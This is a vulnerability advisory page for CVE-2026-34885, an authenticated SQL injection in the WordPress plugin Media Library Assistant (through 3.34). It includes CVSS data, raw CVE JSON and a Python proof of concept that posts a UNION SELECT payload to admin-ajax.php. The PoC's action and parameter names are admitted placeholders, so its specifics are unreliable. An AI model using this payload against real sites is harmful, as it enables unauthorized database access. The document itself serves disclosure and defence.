Security Vulnerability Report
中文
CVE-2026-34885 CVSS 8.5 HIGH

CVE-2026-34885

Published: 2026-04-06 15:17:11
Last Modified: 2026-04-24 18:08:35

Description

Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media LIbrary Assistant allows SQL Injection.This issue affects Media LIbrary Assistant: from n/a through 3.34.

CVSS Details

CVSS Score
8.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Media Library Assistant <= 3.34

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Conceptual Proof of Concept for CVE-2026-34885 # This script demonstrates the potential for SQL Injection in the Media Library Assistant plugin. import requests def check_sqli(target_url, cookie): """Attempts to exploit the SQL injection vulnerability.""" # Example payload to extract MySQL user payload = "1' UNION SELECT 1, 2, user(), 4, 5, 6, 7, 8, 9, 10-- -" # The vulnerable endpoint is typically part of the admin-ajax or plugin specific page exploit_url = f"{target_url}/wp-admin/admin-ajax.php" data = { "action": "mla-gallery-items", # Placeholder action based on plugin structure "mla_gallery_term_id": payload } headers = { "Cookie": cookie } try: response = requests.post(exploit_url, data=data, headers=headers, timeout=10) if response.status_code == 200: print("[+] Request sent successfully. Check response for SQL output.") print("[+] Response snippet:", response.text[:200]) else: print("[-] Exploit request failed.") except Exception as e: print(f"[-] An error occurred: {e}") # Usage # target = "http://example.com" # auth_cookie = "wordpress_logged_in_xxxxxx" # check_sqli(target, auth_cookie)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-34885", "sourceIdentifier": "[email protected]", "published": "2026-04-06T15:17:11.130", "lastModified": "2026-04-24T18:08:35.440", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in David Lingren Media LIbrary Assistant allows SQL Injection.This issue affects Media LIbrary Assistant: from n/a through 3.34."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:L", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.1, "impactScore": 4.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/media-library-assistant/vulnerability/wordpress-media-library-assistant-plugin-3-34-sql-injection-vulnerability?_s_id=cve", "source": "[email protected]"}]}}